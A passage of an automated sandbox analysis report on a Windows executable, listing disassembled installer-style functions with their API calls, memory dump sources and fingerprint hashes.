RemoveDirectoryW.KERNELBASE(?,?,?,00000000,00405DFD), ref: 00405C36
DeleteFileW.KERNELBASE(?,?,?,00000000,00405DFD), ref: 00405C3E
SetFileAttributesW.KERNEL32(?,00000000), ref: 00405C56

Memory Dump Source

Source File: 00000000.00000002.1879269284.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1879243123.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879296706.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879325305.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879325305.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879325305.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879325305.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879443943.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_4hIPvzV6a2.jbxd

Similarity

API ID: File$Attributes$DeleteDirectoryRemove
String ID:
API String ID: 1655745494-0
Opcode ID: db7f6541ced3958ca03b9484ad33d053af3f68eb31512009fba6ce163230055c
Instruction ID: 2cd832b5149a82f614695d38d41b3aba95dfe4f26efc6ce9164d7e3db346642e
Opcode Fuzzy Hash: db7f6541ced3958ca03b9484ad33d053af3f68eb31512009fba6ce163230055c
Instruction Fuzzy Hash: 9AE02B3110D7915AE32077705E0CB5F2AD8DF86324F05093AF492F10C0DB78488A8A7E

Function 0040252F Relevance: 3.1, APIs: 2, Instructions: 56registryCOMMON

Download Yara Rule

APIs

RegQueryValueExW.ADVAPI32(00000000,00000000,?,?,?,?,?,?,?,?,00000033), ref: 00402560
RegCloseKey.KERNELBASE(?,?,?,C:\Users\user\AppData\Local\Temp\nsv4B6.tmp,00000000,00000011,00000002), ref: 00402602

Memory Dump Source

Source File: 00000000.00000002.1879269284.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1879243123.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879296706.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879325305.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879325305.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879325305.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879325305.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879443943.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_4hIPvzV6a2.jbxd

Similarity

API ID: CloseQueryValue
String ID:
API String ID: 3356406503-0
Opcode ID: 49ca1381ded4af27f8ac224b17b3ae694fb74f22b67379b644ce572c4f680cb7
Instruction ID: fa4e9c421320e09d3f2bb14c05bc69cdd2f01bdd483ca55c6e8c3e2e171c6fbc
Opcode Fuzzy Hash: 49ca1381ded4af27f8ac224b17b3ae694fb74f22b67379b644ce572c4f680cb7
Instruction Fuzzy Hash: 11116A71900219EBDB14DFA0DA989AEB7B4FF04349B20447FE406B62C0D7B85A45EB5E

Function 00401389 Relevance: 3.0, APIs: 2, Instructions: 43windowCOMMON

Download Yara Rule

APIs

MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013E4
SendMessageW.USER32(0040A2D8,00000402,00000000), ref: 004013F4

Memory Dump Source

Source File: 00000000.00000002.1879269284.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1879243123.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879296706.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879325305.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879325305.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879325305.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879325305.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879443943.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_4hIPvzV6a2.jbxd

Similarity

API ID: MessageSend
String ID:
API String ID: 3850602802-0
Opcode ID: a48e27458ca857e7bf1c95edfaa4f4fc3f64b4f364872359a8149092e2b898a4
Instruction ID: 0adee223d2b7ba7d815a442a2885e1f2b60e3b86eb1a18037e9b6c54a102055c
Opcode Fuzzy Hash: a48e27458ca857e7bf1c95edfaa4f4fc3f64b4f364872359a8149092e2b898a4
Instruction Fuzzy Hash: 0E01FF31620220AFE7195B389E05B6B3698E710329F10863FF851F62F1EA78DC429B4C

Function 00405AAB Relevance: 3.0, APIs: 2, Instructions: 26COMMON

Download Yara Rule

APIs

CreateDirectoryW.KERNELBASE(00437800,?), ref: 00405AED
GetLastError.KERNEL32 ref: 00405AFB

Memory Dump Source

Source File: 00000000.00000002.1879269284.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1879243123.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879296706.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879325305.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879325305.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879325305.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879325305.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879443943.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_4hIPvzV6a2.jbxd

Similarity

API ID: CreateDirectoryErrorLast
String ID:
API String ID: 1375471231-0
Opcode ID: 93d1f65b513afb97053b6d969de6af344d99c991354c8e43ed6bd2c6eb9068ab
Instruction ID: ed7a645988c2e2a06802fdc928ba12763e2e88a5fcf473fdfb2f1107ef0c66eb
Opcode Fuzzy Hash: 93d1f65b513afb97053b6d969de6af344d99c991354c8e43ed6bd2c6eb9068ab
Instruction Fuzzy Hash: 56F0F970D0060DDBDB00CFA4C5497DFBBB4AB04305F00812AD545B6281D7B95248CBA9

Function 00405B3A Relevance: 3.0, APIs: 2, Instructions: 24processCOMMON

Download Yara Rule

APIs

CreateProcessW.KERNELBASE(00000000,00437800,00000000,00000000,00000000,04000000,00000000,00000000,0042FA70,?,?,?,00437800,?), ref: 00405B63
CloseHandle.KERNEL32(?,?,?,00437800,?), ref: 00405B70

Memory Dump Source

Source File: 00000000.00000002.1879269284.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1879243123.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879296706.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879325305.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879325305.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879325305.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879325305.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879443943.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_4hIPvzV6a2.jbxd

Similarity

API ID: CloseCreateHandleProcess
String ID:
API String ID: 3712363035-0
Opcode ID: 6fd2602221babf1a8a9a6246b82f99e4ae13039f11edd6951af80fecf8f79ee2
Instruction ID: b1032d8704f3223f2a9afbe03a7757fefc60a77e8ecf1711bb84520e71ece662
Opcode Fuzzy Hash: 6fd2602221babf1a8a9a6246b82f99e4ae13039f11edd6951af80fecf8f79ee2
Instruction Fuzzy Hash: 91E09AB4600219BFEB109B74AD06F7B767CE704604F408475BD15E2151D774A8158A78

Function 0040694B Relevance: 3.0, APIs: 2, Instructions: 22libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(?,00000020,?,00403642,0000000C,?,?,?,?,?,?,?,?), ref: 0040695D
GetProcAddress.KERNEL32(00000000,?), ref: 00406978

Part of subcall function 004068DB: GetSystemDirectoryW.KERNEL32(?,00000104), ref: 004068F2
Part of subcall function 004068DB: wsprintfW.USER32 ref: 0040692D
Part of subcall function 004068DB: LoadLibraryExW.KERNEL32(?,00000000,00000008), ref: 00406941

Memory Dump Source

Source File: 00000000.00000002.1879269284.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1879243123.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879296706.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879325305.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879325305.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879325305.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879325305.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879443943.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_4hIPvzV6a2.jbxd

Similarity

API ID: AddressDirectoryHandleLibraryLoadModuleProcSystemwsprintf
String ID:
API String ID: 2547128583-0
Opcode ID: 38b25401b771ecf209a524bd0999a173af8b0ad39984603ae0a2953bb283c85e
Instruction ID: ff64ee7455e026c1647d72c339307a336527f79dacb59e64982fca04d7429b22
Opcode Fuzzy Hash: 38b25401b771ecf209a524bd0999a173af8b0ad39984603ae0a2953bb283c85e
Instruction Fuzzy Hash: 38E08673504210AFD61057705D04D27B3A89F85740302443EF946F2140DB34DC32ABA9

Function 00406047 Relevance: 3.0, APIs: 2, Instructions: 16fileCOMMON

Download Yara Rule

APIs

GetFileAttributesW.KERNELBASE(00000003,004030C2,C:\Users\user\Desktop\4hIPvzV6a2.exe,80000000,00000003), ref: 0040604B
CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 0040606D

Memory Dump Source

Source File: 00000000.00000002.1879269284.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1879243123.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879296706.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879325305.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879325305.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879325305.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879325305.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879443943.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_4hIPvzV6a2.jbxd

Similarity

API ID: File$AttributesCreate
String ID:
API String ID: 415043291-0
Opcode ID: 6be4d53c09d0ea7202590e2ef391dde9d68f005235e9a58d36352f422cb06a2c
Instruction ID: 9d50a09f5748d4f60ef03139cc16a9656d1073ae209d3065c053d14625e31d4c
Opcode Fuzzy Hash: 6be4d53c09d0ea7202590e2ef391dde9d68f005235e9a58d36352f422cb06a2c
Instruction Fuzzy Hash: 87D09E31654301AFEF098F20DE16F2EBAA2EB84B00F11552CB682941E0DA715819DB15

Function 00406022 Relevance: 3.0, APIs: 2, Instructions: 13COMMON

Download Yara Rule

APIs

GetFileAttributesW.KERNELBASE(?,?,00405C27,?,?,00000000,00405DFD,?,?,?,?), ref: 00406027
SetFileAttributesW.KERNELBASE(?,00000000), ref: 0040603B

Memory Dump Source

Source File: 00000000.00000002.1879269284.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1879243123.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879296706.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879325305.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879325305.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879325305.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879325305.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879443943.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_4hIPvzV6a2.jbxd

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: bc30e5c928ed30f9cb3e730bb3a024ff28878b527ec9bdb2640fa07c227b463d
Instruction ID: 97cbb32404f08d1f6fed837f871d2b37f55cf766f9720be9b575451f5cdabe77
Opcode Fuzzy Hash: bc30e5c928ed30f9cb3e730bb3a024ff28878b527ec9bdb2640fa07c227b463d
Instruction Fuzzy Hash: A3D0C972504220AFC2102728AE0889BBB55EB542717028A35FCA9A22B0CB304CA68694

Function 00403B4F Relevance: 3.0, APIs: 1, Strings: 1, Instructions: 11COMMON

Download Yara Rule

APIs

CloseHandle.KERNEL32(FFFFFFFF,00403A82,?,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403B5A

Strings

C:\Users\user\AppData\Local\Temp\nsv4B6.tmp\, xrefs: 00403B6E

Memory Dump Source

Source File: 00000000.00000002.1879269284.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1879243123.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879296706.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879325305.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879325305.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879325305.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879325305.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879443943.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_4hIPvzV6a2.jbxd

Similarity

API ID: CloseHandle
String ID: C:\Users\user\AppData\Local\Temp\nsv4B6.tmp\
API String ID: 2962429428-3755816549
Opcode ID: ae973bb0dca4e4815b90d97470301ae31a1ae4600fd43aa67c366af3984d4a62
Instruction ID: 69482a2579ef2b85c2ad9764c5c762c9eb4f19b2fcf4b87e51b14fafea8afdc0
Opcode Fuzzy Hash: ae973bb0dca4e4815b90d97470301ae31a1ae4600fd43aa67c366af3984d4a62
Instruction Fuzzy Hash: EDC0123090470496F1206F79AE8FA153A64574073DBA48726B0B8B10F3CB7C5659555D

Function 00405B05 Relevance: 3.0, APIs: 2, Instructions: 9COMMON

Download Yara Rule

APIs

CreateDirectoryW.KERNELBASE(?,00000000,00403525,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040381C,?,00000008,0000000A,0000000C), ref: 00405B0B
GetLastError.KERNEL32(?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00405B19

Memory Dump Source

Source File: 00000000.00000002.1879269284.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1879243123.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879296706.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879325305.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879325305.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879325305.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879325305.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879443943.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_4hIPvzV6a2.jbxd

Similarity

API ID: CreateDirectoryErrorLast
String ID:
API String ID: 1375471231-0
Opcode ID: 7ce514c051633c67dabed91c1ba2c830ad6f4192d7236d4c27a26ed09d9cb01d
Instruction ID: 8c4969e502f5bc4c8dfdefb7e9c2ba363b64d1215f12130c86bef4ebeef6f559
Opcode Fuzzy Hash: 7ce514c051633c67dabed91c1ba2c830ad6f4192d7236d4c27a26ed09d9cb01d
Instruction Fuzzy Hash: 19C08C30310902DACA802B209F087173960AB80340F158439A683E00B4CA30A065C92D

Function 004063F2 Relevance: 1.5, APIs: 1, Instructions: 24registryCOMMON

Download Yara Rule

APIs

RegCreateKeyExW.KERNELBASE(00000000,?,00000000,00000000,00000000,?,00000000,?,00000000,?,?,?,00402E5C,00000000,?,?), ref: 0040641B

Memory Dump Source

Source File: 00000000.00000002.1879269284.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1879243123.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879296706.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879325305.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879325305.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879325305.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879325305.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879443943.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_4hIPvzV6a2.jbxd

Similarity

API ID: Create
String ID:
API String ID: 2289755597-0
Opcode ID: b17b4e85cc10dff7c00d1995fa2300a068af545831f113dbcef6cd8b4d780b07
Instruction ID: 64249f1610b479570df181ce2e9e182bf10c6facee3c5f7fb09e5bef7ea49c41
Opcode Fuzzy Hash: b17b4e85cc10dff7c00d1995fa2300a068af545831f113dbcef6cd8b4d780b07
Instruction Fuzzy Hash: E6E0E672010109BFEF095F90DD4AD7B7B1DE708310F11492EF906D5051E6B5E9305674

Function 004060CA Relevance: 1.5, APIs: 1, Instructions: 22fileCOMMON

Download Yara Rule

APIs

ReadFile.KERNELBASE(00000000,00000000,00000004,00000004,00000000,000000FF,?,004034E7,00000000,00000000,0040330B,000000FF,00000004,00000000,00000000,00000000), ref: 004060DE

Memory Dump Source

Source File: 00000000.00000002.1879269284.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1879243123.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879296706.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879325305.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879325305.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879325305.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879325305.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879443943.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_4hIPvzV6a2.jbxd

Similarity

API ID: FileRead
String ID:
API String ID: 2738559852-0
Opcode ID: 076a4193e787d8b2f8fcded04b516b0b1a94860d7d4352c54bed072072f3bbd3
Instruction ID: a77d82ba430c16999eb1f2306cb11816df14181100402a9e04059793f1b3015d
Opcode Fuzzy Hash: 076a4193e787d8b2f8fcded04b516b0b1a94860d7d4352c54bed072072f3bbd3
Instruction Fuzzy Hash: 21E08632150219ABCF10DF948C00EEB3B9CFF04390F018436FD11E3040D630E92197A4

Function 004060F9 Relevance: 1.5, APIs: 1, Instructions: 22fileCOMMON

Download Yara Rule

APIs

WriteFile.KERNELBASE(00000000,00000000,00000004,00000004,00000000,000000FF,?,0040349D,00000000,0041EA20,000000FF,0041EA20,000000FF,000000FF,00000004,00000000), ref: 0040610D

Memory Dump Source

Source File: 00000000.00000002.1879269284.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1879243123.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879296706.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879325305.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879325305.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879325305.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879325305.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879443943.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_4hIPvzV6a2.jbxd

Similarity

API ID: FileWrite
String ID:
API String ID: 3934441357-0
Opcode ID: 4494c28c6fc58b77f7b94402ffbb10e79d92760fb9961e7d9dbcb201027e3d13
Instruction ID: 78408803ccc59d93ae5352641a5e7b8f709900c8df5e8e9e13d69f82a1dcf02f
Opcode Fuzzy Hash: 4494c28c6fc58b77f7b94402ffbb10e79d92760fb9961e7d9dbcb201027e3d13
Instruction Fuzzy Hash: 8FE08C3220021ABBCF109E908C00EEB3FACEB003A0F014432FA26E6050D670E83097A4

Function 00406317 Relevance: 1.5, APIs: 1, Instructions: 13COMMON

Download Yara Rule

APIs

MoveFileExW.KERNELBASE(?,?,00000005,00405E15,?,00000000,000000F1,?,?,?,?,?), ref: 00406321

Part of subcall function 0040619D: CloseHandle.KERNEL32(00000000,?,00000000,00000001,?,00000000,?,?,00406338,?,?), ref: 004061D8
Part of subcall function 0040619D: GetShortPathNameW.KERNEL32(?,00430108,00000400), ref: 004061E1
Part of subcall function 0040619D: GetShortPathNameW.KERNEL32(?,00430908,00000400), ref: 004061FE
Part of subcall function 0040619D: wsprintfA.USER32 ref: 0040621C
Part of subcall function 0040619D: GetFileSize.KERNEL32(00000000,00000000,00430908,C0000000,00000004,00430908,?,?,?,?,?), ref: 00406257
Part of subcall function 0040619D: GlobalAlloc.KERNEL32(00000040,0000000A,?,?,?,?), ref: 00406266
Part of subcall function 0040619D: lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 0040629E
Part of subcall function 0040619D: SetFilePointer.KERNEL32(0040A580,00000000,00000000,00000000,00000000,0042FD08,00000000,-0000000A,0040A580,00000000,[Rename],00000000,00000000,00000000), ref: 004062F4

Memory Dump Source

Source File: 00000000.00000002.1879269284.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1879243123.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879296706.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879325305.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879325305.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879325305.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879325305.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879443943.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_4hIPvzV6a2.jbxd

Similarity

API ID: File$NamePathShort$AllocCloseGlobalHandleMovePointerSizelstrcpywsprintf
String ID:
API String ID: 1930046112-0
Opcode ID: bc3e1b88f0876d926df3a32e41be61310c0030b55e7fa6024756c8d654897218
Instruction ID: 6159d32a83a49ea468dc4acced1e1393ecd315f35058df340afbcf3d631cb787
Opcode Fuzzy Hash: bc3e1b88f0876d926df3a32e41be61310c0030b55e7fa6024756c8d654897218
Instruction Fuzzy Hash: 2AD0C731108741BEDB011F50ED0995B7BA1FFA4355F11C43EF599540B1D7319461DF05

Function 004034EA Relevance: 1.5, APIs: 1, Instructions: 6COMMON

Download Yara Rule

APIs

SetFilePointer.KERNELBASE(00000000,00000000,00000000,00403247,?), ref: 004034F8

Memory Dump Source

Source File: 00000000.00000002.1879269284.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1879243123.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879296706.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879325305.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879325305.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879325305.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879325305.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879443943.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_4hIPvzV6a2.jbxd

Similarity

API ID: FilePointer
String ID:
API String ID: 973152223-0
Opcode ID: 9851be0de28bb9513f6e500a0df6ea838ed72b99fd7baa621d8f85bec57c8f40
Instruction ID: 1f5c7ae16c2334422adcad36111bde95194575cbdac9b1f52e29a9f6e91cc98e
Opcode Fuzzy Hash: 9851be0de28bb9513f6e500a0df6ea838ed72b99fd7baa621d8f85bec57c8f40
Instruction Fuzzy Hash: 34B01271240300BFDA214F00DF09F057B21ABA0700F10C034B388380F086711035EB0D

Function 00401FA9 Relevance: 1.3, APIs: 1, Instructions: 37COMMON

Download Yara Rule

APIs

Part of subcall function 004055DC: lstrlenW.KERNEL32(0042BA48,00000000,00423E20,74DF23A0,?,?,?,?,?,?,?,?,?,0040341D,00000000,?), ref: 00405614
Part of subcall function 004055DC: lstrlenW.KERNEL32(0040341D,0042BA48,00000000,00423E20,74DF23A0,?,?,?,?,?,?,?,?,?,0040341D,00000000), ref: 00405624
Part of subcall function 004055DC: lstrcatW.KERNEL32(0042BA48,0040341D,0040341D,0042BA48,00000000,00423E20,74DF23A0), ref: 00405637
Part of subcall function 004055DC: SetWindowTextW.USER32(0042BA48,0042BA48), ref: 00405649
Part of subcall function 004055DC: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040566F
Part of subcall function 004055DC: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405689
Part of subcall function 004055DC: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405697

Part of subcall function 00405B3A: CreateProcessW.KERNELBASE(00000000,00437800,00000000,00000000,00000000,04000000,00000000,00000000,0042FA70,?,?,?,00437800,?), ref: 00405B63
Part of subcall function 00405B3A: CloseHandle.KERNEL32(?,?,?,00437800,?), ref: 00405B70

CloseHandle.KERNEL32(?,?,?,?,?,?), ref: 00401FF0

Part of subcall function 004069F6: WaitForSingleObject.KERNEL32(?,00000064), ref: 00406A07
Part of subcall function 004069F6: GetExitCodeProcess.KERNEL32(?,?), ref: 00406A29

Part of subcall function 0040649E: wsprintfW.USER32 ref: 004064AB

Memory Dump Source

Source File: 00000000.00000002.1879269284.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1879243123.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879296706.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879325305.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879325305.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879325305.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879325305.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
